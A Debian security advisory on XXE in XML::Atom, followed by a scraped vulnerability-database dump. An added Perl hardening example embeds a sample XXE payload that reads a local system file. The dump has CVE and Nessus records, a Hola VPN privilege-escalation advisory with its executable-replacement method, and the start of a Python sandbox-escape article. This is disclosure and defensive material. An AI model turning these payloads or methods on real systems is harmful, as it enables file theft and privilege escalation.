-------------------------------------------------------------------------
Debian Security Advisory DSA-2424-1                   security@debian.org
http://www.debian.org/security/                            Florian Weimer
March 04, 2012                         http://www.debian.org/security/faq
-------------------------------------------------------------------------

Package        : libxml-atom-perl
Vulnerability  : XML external entity expansion
Problem type   : remote
Debian-specific: no

It was discovered that the XML::Atom Perl module did not disable the
expansion of external entities when parsing XML from potentially
untrusted sources. This may allow attackers to gain read access to
otherwise protected resources, depending on how the library is used.

For the stable distribution (squeeze), this problem has been fixed in
version 0.37-1+squeeze1.

For the testing distribution (wheezy) and the unstable distribution
(sid), this problem has been fixed in version 0.39-1.

We recommend that you upgrade your libxml-atom-perl packages.

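
What "disable external entities" amounts to in practice, shown against XML::LibXML, the parser backend XML::Atom can be built on, using a constructed Atom entry that declares an external entity; this is an added example, not code from XML::Atom or from Debian. It assumes XML::LibXML is installed, and the file path inside the sample entity declaration is only a placeholder.

```perl
#!/usr/bin/perl
# Added example (not XML::Atom's own code): parse an untrusted Atom entry with
# XML::LibXML configured so that external entities are neither expanded nor
# fetched. Assumes XML::LibXML is installed.
use strict;
use warnings;
use XML::LibXML qw(:libxml);   # exports node-type constants such as XML_ENTITY_REF_NODE

my $ATOM_NS = 'http://www.w3.org/2005/Atom';

# Constructed sample input: an Atom entry whose internal DTD subset declares an
# external entity. A parser that expands external entities would copy the
# referenced file into <title>; the path here is only a placeholder.
my $untrusted_entry = <<'XML';
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE entry [
  <!ENTITY ext SYSTEM "file:///etc/hostname">
]>
<entry xmlns="http://www.w3.org/2005/Atom">
  <title>&ext;</title>
</entry>
XML

# Every attempt by libxml2 to fetch an external resource is routed through this
# loader. Refusing here covers the case where libxml2 still tries to read an
# external parsed entity for well-formedness checking even though substitution
# is switched off.
my @load_attempts;
XML::LibXML::externalEntityLoader(sub {
    my ($system_id, $public_id) = @_;
    push @load_attempts, $system_id;
    return '';                 # hand back empty content instead of the resource
});

# Parser configured for untrusted input. XML::LibXML's default for
# expand_entities is 1 (substitute), which is the behaviour the advisory
# describes as missing from XML::Atom.
sub hardened_parser {
    return XML::LibXML->new(
        expand_entities => 0,  # keep &ext; as an entity reference node
        load_ext_dtd    => 0,  # never fetch an external DTD subset
        no_network      => 1,  # no http:// or ftp:// fetches during parsing
        huge            => 0,  # keep libxml2's size limits (entity expansion bombs)
    );
}

# Returns a hash describing what ended up in <title>: the text libxml2 exposes,
# whether the entity reference survived unexpanded, and how many external
# loads the loader above had to refuse.
sub inspect_title {
    my ($parser, $xml) = @_;
    my $doc     = $parser->parse_string($xml);
    my ($title) = $doc->getElementsByTagNameNS($ATOM_NS, 'title');
    my $has_ref = grep { $_->nodeType == XML_ENTITY_REF_NODE } $title->childNodes;
    return {
        text            => $title->textContent,
        entity_ref_kept => $has_ref ? 1 : 0,
        load_attempts   => scalar @load_attempts,
    };
}

my $result = inspect_title(hardened_parser(), $untrusted_entry);
printf "title text:          '%s'\n", $result->{text};
printf "entity ref kept:     %d\n",   $result->{entity_ref_kept};
printf "external loads seen: %d (all answered with empty content)\n",
       $result->{load_attempts};
```

Running the same input through a default `XML::LibXML->new()` without the loader is the behaviour to test for when auditing code that feeds untrusted feeds to XML::Atom.
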
Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/
{"id": "SECURITYVULNS:DOC:27718", "bulletinFamily": "software", "title": "[SECURITY] [DSA 2424-1] libxml-atom-perl security update", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- -------------------------------------------------------------------------\r\nDebian Security Advisory DSA-2424-1 security@debian.org\r\nhttp://www.debian.org/security/ Florian Weimer\r\nMarch 04, 2012 http://www.debian.org/security/faq\r\n- -------------------------------------------------------------------------\r\n\r\nPackage : libxml-atom-perl\r\nVulnerability : XML external entity expansion\r\nProblem type : remote\r\nDebian-specific: no\r\n\r\nIt was discovered that the XML::Atom Perl module did not disable\r\nexternal entities when parsing XML from potentially untrusted sources.\r\nThis may allow attackers to gain read access to otherwise protected\r\nressources, depending on how the library is used.\r\n\r\nFor the stable distribution (squeeze), this problem has been fixed in\r\nversion 0.37-1+squeeze1.\r\n\r\nFor the testing distribution (wheezy) and the unstable distribution\r\n(sid), this problem has been fixed in version 0.39-1.\r\n\r\nWe recommend that you upgrade your libxml-atom-perl packages.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: http://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niQEcBAEBAgAGBQJPU5qcAAoJEL97/wQC1SS+vPkIAKqYWwKE0IX7TSP4APfXs8DH\r\nkwfLZhRbQIqOFtYP3j+p9IQwHLJkc6wjrtXG05AAWoNqca65tx9qadie20+APU0A\r\nYuWJRv5/KXpr6osXSvPaLbJcSSmHSZh4Cl1o0efE1KpXVwtPL7XYjHUH8SVsqPWb\r\n6kTHzAI5Oa7PB8ZgSzJ3ebauc0CuoQAIZEWgYup8RqtoDkGGZrgzfel6aq4Oxj4Z\r\n5wxwpc4rDKFRpUFpZyKzszz5h2bEEDFTLyUXfVzYDpeEqLNeiSHT6/O3pJL9FtBr\r\n8VHuAuo1b9NtIlGxDGXulsRHFFaDIMbmYBKtlhTWZ3LhxOSw5T5Wc6FULhHEO6s=\r\n=fCTR\r\n-----END PGP 
SIGNATURE-----\r\n", "published": "2012-03-09T00:00:00", "modified": "2012-03-09T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27718", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:43", "edition": 1, "viewCount": 5, "enchantments": {"score": {"value": 5.8, "vector": "NONE", "modified": "2018-08-31T11:10:43", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-7273", "CVE-2014-2595", "CVE-2015-9286", "CVE-2008-7272"]}, {"type": "zdt", "idList": ["1337DAY-ID-27718"]}, {"type": "myhack58", "idList": ["MYHACK58:62201785015"]}, {"type": "seebug", "idList": ["SSV:92847"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:32652", "SECURITYVULNS:DOC:32654", "SECURITYVULNS:DOC:32653", "SECURITYVULNS:DOC:32656", "SECURITYVULNS:VULN:14755", "SECURITYVULNS:VULN:14753", "SECURITYVULNS:DOC:32651", "SECURITYVULNS:VULN:14720", "SECURITYVULNS:DOC:32660", "SECURITYVULNS:DOC:32658"]}], "modified": "2018-08-31T11:10:43", "rev": 2}, "vulnersScore": 5.8}, "affectedSoftware": []}
{"cve": [{"lastseen": "2020-12-29T14:33:29", "description": "When a BIG-IP ASM or Advanced WAF system running version 16.0.0-16.0.0.1, 15.1.0-15.1.0.5, 14.1.0-14.1.3, 13.1.0-13.1.3.4, 12.1.0-12.1.5.2, or 11.6.1-11.6.5.2 processes requests with JSON payload, an unusually large number of parameters can cause excessive CPU usage in the BIG-IP ASM bd process.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2020-12-24T15:15:00", "title": "CVE-2020-27718", "type": "cve", "cwe": ["CWE-400"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27718"], "modified": "2020-12-28T18:43:00", "cpe": ["cpe:/a:f5:big-ip_advanced_web_application_firewall:12.1.5", "cpe:/a:f5:big-ip_advanced_web_application_firewall:11.6.5", "cpe:/a:f5:big-ip_application_security_manager:12.1.5", "cpe:/a:f5:big-ip_application_security_manager:11.6.5"], "id": "CVE-2020-27718", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-27718", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:f5:big-ip_advanced_web_application_firewall:12.1.5:*:*:*:*:*:*:*", 
"cpe:2.3:a:f5:big-ip_application_security_manager:11.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_security_manager:12.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_advanced_web_application_firewall:11.6.5:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T12:01:15", "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-12T01:15:00", "title": "CVE-2014-2595", "type": "cve", "cwe": ["CWE-613"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2595"], "modified": "2020-02-20T15:55:00", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "id": "CVE-2014-2595", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:28:28", "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due 
to insecure tempfile handling.", "edition": 7, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-11-18T22:15:00", "title": "CVE-2008-7273", "type": "cve", "cwe": ["CWE-59"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7273"], "modified": "2019-11-20T15:56:00", "cpe": [], "id": "CVE-2008-7273", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2020-12-09T19:28:28", "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", 
"userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2019-11-08T00:15:00", "title": "CVE-2008-7272", "type": "cve", "cwe": ["CWE-312"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7272"], "modified": "2020-02-10T21:16:00", "cpe": [], "id": "CVE-2008-7272", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2020-12-09T20:03:10", "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 5, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2019-04-30T14:29:00", "title": "CVE-2015-9286", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", 
"accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-9286"], "modified": "2019-05-01T14:22:00", "cpe": [], "id": "CVE-2015-9286", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}], "nessus": [{"lastseen": "2021-01-09T02:02:06", "description": "When the BIG-IP ASM system processes requests with JSON payload, an\nunusually large number of parameters can cause excessive CPU usage in\nthe BIG-IP ASM bd process. (CVE-2020-27718)\n\nImpact\n\nWhen this vulnerability is exploited, the BIG-IP ASM system may take\nlonger than usual to process these requests. As a result, the BIG-IP\nASM system may experience some latency when passing requests to the\nbackend server. Only BIG-IP ASM systems configured with JSON content\nprofile with parameter parsing (enabled by default) are affected.", "edition": 4, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2020-12-17T00:00:00", "title": "F5 Networks BIG-IP : BIG-IP ASM vulnerability (K58102101)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-27718"], "modified": "2020-12-17T00:00:00", "cpe": ["cpe:/a:f5:big-ip_application_security_manager", "cpe:/h:f5:big-ip"], "id": "F5_BIGIP_SOL58102101.NASL", "href": "https://www.tenable.com/plugins/nessus/144355", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K58102101.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(144355);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/08\");\n\n script_cve_id(\"CVE-2020-27718\");\n script_xref(name:\"IAVA\", value:\"2021-A-0004\");\n\n 
script_name(english:\"F5 Networks BIG-IP : BIG-IP ASM vulnerability (K58102101)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"When the BIG-IP ASM system processes requests with JSON payload, an\nunusually large number of parameters can cause excessive CPU usage in\nthe BIG-IP ASM bd process. (CVE-2020-27718)\n\nImpact\n\nWhen this vulnerability is exploited, the BIG-IP ASM system may take\nlonger than usual to process these requests. As a result, the BIG-IP\nASM system may experience some latency when passing requests to the\nbackend server. Only BIG-IP ASM systems configured with JSON content\nprofile with parameter parsing (enabled by default) are affected.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K58102101\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution K58102101.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-27718\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/24\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/17\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! 
get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"K58102101\";\nvmatrix = make_array();\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"16.0.0\",\"15.0.0-15.1.0\",\"14.1.0-14.1.3\",\"13.1.0-13.1.3\",\"12.1.0-12.1.5\",\"11.6.1-11.6.5\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"16.0.1\",\"15.1.1\",\"14.1.3.1\",\"13.1.3.5\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_warning(port:0, extra:bigip_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running the affected module ASM\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "zdt": [{"lastseen": "2018-03-01T19:35:58", "description": "Hola VPN version 1.34 suffers from a privilege escalation vulnerability.", "edition": 1, "published": "2017-05-04T00:00:00", "title": "Hola VPN 1.34 Privilege Escalation Vulnerability", "type": "zdt", "bulletinFamily": "exploit", "cvelist": [], "modified": "2017-05-04T00:00:00", "href": "https://0day.today/exploit/description/27718", "id": "1337DAY-ID-27718", "sourceData": "Document Title:\r\n===============\r\nHola VPN v1.34 - Privilege Escalation Vulnerability\r\n\r\n\r\nVulnerability Class:\r\n====================\r\nPrivilege Escalation\r\n\r\n\r\nProduct & Service Introduction:\r\n===============================\r\nHola's goal is to make the internet faster, more open, and cheaper to operate. Hola is a collaborative (P2P) internet -- Hola works by sharing \r\nthe idle resources of its users for the benefit of all. Hola provides several products based on this resource sharing technology:\r\n\r\nHola's VPN network allows consumers to browse the web privately, securely, and freely. 
Making the world wide web worldwide again. Hola is used \r\nby over 80 million people! Luminati has disrupted the way businesses conduct brand monitoring (checking the prices of their products in various stores), \r\nself-test (checking how their corporate site looks from multiple countries), anti ad-fraud and so on, by providing them a privacy network. Hola's Video \r\nCDN changes the game in video delivery. Designed as a service for video publishers, HolaCDN makes videos start faster, buffer less, and at a fraction \r\nof the costs of traditional businesses.\r\n\r\n(Copy of the Vendor Homepage: http://hola.org/faq#intro-howfree )\r\n\r\n\r\nAbstract Advisory Information:\r\n==============================\r\nThe vulnerability laboratory core research team discovered an privilege escalation vulnerability in the official Hola VPN v1.34 client software.\r\n\r\n\r\nVulnerability Disclosure Timeline:\r\n==================================\r\n2016-05-03: Public Disclosure (Vulnerability Laboratory)\r\n\r\n\r\nDiscovery Status:\r\n=================\r\nPublished\r\n\r\n\r\nAffected Product(s):\r\n====================\r\nHola Networks Ltd\r\nProduct: Hola - VPN Software (Windows) 1.34\r\n\r\n\r\nExploitation Technique:\r\n=======================\r\nLocal\r\n\r\n\r\nSeverity Level:\r\n===============\r\nMedium\r\n\r\n\r\nTechnical Details & Description:\r\n================================\r\nA local privilege escalation vulnerability has been discovered in the official Hola VPN v1.34 client software.\r\nThe local security vulnerability allows an attackers to gain higher access privileges by exploitation of an \r\ninsecure permission misconfiguration.\r\n\r\nThe software suffers from a local privilege escalation vulnerability. Users are able to change the files with \r\nexecutable access to a binary of choice. The issue is located in the misconfigured permission values with the \r\n`F`(full) flag in the users and everyone group. 
The group/user permission for the path is assigned to the \r\neveryone group. Local attackers could exploit the vulnerability by a replace of the `7za.exe` or \r\n`hola.exe`...etc files with a malicious executable file. The malicious file is exectuable with the \r\nlocal system user permissions.\r\n\r\nThe security risk of the vulnerability is estimated as medium (CVSS 3.2). Exploitation of the software vulnerability \r\nrequires a low privilege system user account with restricted access and without user interaction. Successful exploitation \r\nof the vulnerability results in system process compromise and further manipulation or exploitation to compromise the \r\nlocal computer operating system.\r\n\r\n\r\nProof of Concept (PoC):\r\n=======================\r\nThe local privilege escalation vulnerability can be exploited by local attackers without user interaction and with system user account.\r\nFor security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.\r\n\r\n\r\n--- Session Logs (Privileges) ---\r\nC:Program FilesHolaapp Everyone:F\r\nC:Program FilesHoladb Everyone:F\r\nC:Program FilesHolahola_svc.exe.cid Everyone:F\r\nC:Program FilesHolahola_updater.exe.cid Everyone:F\r\nC:Program FilesHolalog Everyone:F\r\nC:Program FilesHolatemp Everyone:F\r\n\r\nC:Program FilesHola\r\nMedium Mandatory Level (Default) [No-Write-Up]\r\nRW Everyone\r\n FILE_ALL_ACCESS\r\nRW NT SERVICETrustedInstaller\r\n FILE_ALL_ACCESS\r\nRW NT AUTHORITYSYSTEM\r\n FILE_ALL_ACCESS\r\nRW BUILTINAdministrators\r\n FILE_ALL_ACCESS\r\nR BUILTINUsers\r\n FILE_LIST_DIRECTORY\r\n FILE_READ_ATTRIBUTES\r\n FILE_READ_EA\r\n FILE_TRAVERSE\r\n SYNCHRONIZE\r\n READ_CONTROL\r\n\r\nC:Program FilesHola Everyone:F \r\nNT SERVICETrustedInstaller:(ID)F\r\nNT SERVICETrustedInstaller:(CI)(IO)(ID)F\r\nNT AUTHORITYSYSTEM:(ID)F\r\nNT 
AUTHORITYSYSTEM:(OI)(CI)(IO)(ID)F\r\nBUILTINAdministrators:(ID)F\r\nBUILTINAdministrators:(OI)(CI)(IO)(ID)F\r\nBUILTINUsers:(ID)R\r\nBUILTINUsers:(OI)(CI)(IO)(ID)(special access:)\r\nGENERIC_READ\r\nGENERIC_EXECUTE\r\nCREATOR OWNER:(OI)(CI)(IO)(ID)F\r\n\r\n7za.exe Everyone:(F)\r\n NT AUTHORITYSYSTEM:(I)(F)\r\n BUILTINAdministrators:(I)(F)\r\n BUILTINUsers:(I)(RX)\r\nhola.exe Everyone:(F)\r\n NT AUTHORITYSYSTEM:(I)(F)\r\n BUILTINAdministrators:(I)(F)\r\n BUILTINUsers:(I)(RX)\r\nhola_setup.exe NT AUTHORITYSYSTEM:(I)(F)\r\n BUILTINAdministrators:(I)(F)\r\n BUILTINUsers:(I)(RX)\r\nhola_svc.exe Everyone:(F)\r\n NT AUTHORITYSYSTEM:(I)(F)\r\n BUILTINAdministrators:(I)(F)\r\n BUILTINUsers:(I)(RX)\r\nhola_updater.exe Everyone:(F)\r\n NT AUTHORITYSYSTEM:(I)(F)\r\n BUILTINAdministrators:(I)(F)\r\n BUILTINUsers:(I)(RX)\n\n# 0day.today [2018-03-01] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/27718"}], "myhack58": [{"lastseen": "2017-04-06T21:23:59", "bulletinFamily": "info", "cvelist": [], "edition": 1, "description": "Simply skip the text the author's README, we directly enter into the technical details.~ \nThe Python environment using a custom whitelist/blacklist programs to prevent access to dangerous built-in functions, modules, functions, etc. Based on the[operating system](<http://www.myhack58.com/Article/48/Article_048_1.htm>)the isolation provides some additional protection, although it may be somewhat dated it. To break the lock the Python interpreter is not a 100% victory, but it so that the attacker can be a threat to the[operating system](<http://www.myhack58.com/Article/48/Article_048_1.htm>)itself. \nAuthor, thought so, the Python module is usually packaged after the C code, then whether we can find memory malicious tampering or use memory corruption vulnerabilities to achieve a Python sandbox Escape it? \nThen, we The from which to start. I know in Python]sandbox can only import a whitelist of Python modules. 
Maybe I should run a distributed AFL fuzzer network? Or a symbolic execution engine? Or maybe I should use the most advanced static analysis tool to scan them? Of course, I can do any of these things. Or I can track some bugs, to query whether there are still available there. \n! [](/Article/UploadPic/2017-4/20174731142961. png? www. myhack58. com) \n! [](/Article/UploadPic/2017-4/20174731142469. png? www. myhack58. com) \n! [](/Article/UploadPic/2017-4/20174731142371. png? www. myhack58. com) \nIn the author manually through code review and testing, found a Pyhon sandbox whitelist of the module one can use the memory corruption vulnerabilities. This bug exists in the Numpy module. This is a python implementation of the scientific computing package. Include: 1, a powerful N-dimensional array object Array; 2, the more Mature the broadcast function of the library; 3, for the integration of C/C++and Fortran Code of the Toolkit; 4, practical linear algebra, Fourier transform, and random number generation functions. numpy and sparse matrix computation package scipy with the use of more convenient. \nNumPy\uff08Numeric Python provides many advanced numeric programming tools, such as: matrix data type, vector processing, and sophisticated computation libraries. Designed for rigorous digital processing is generated. More for many large financial companies use, as well as the core of scientific computing organizations such as Lawrence Livermore, NASA with its handling of some of the originally used C++, Fortran or Matlab, etc. to do the task. \nIf you want to from Numpy as a start, then I start to analyze the source code, The first authors to see the number of lines of code to: \n\n$ cloc * 520 text files. 516 unique files. 43 files ignored. http://cloc. sourceforge. 
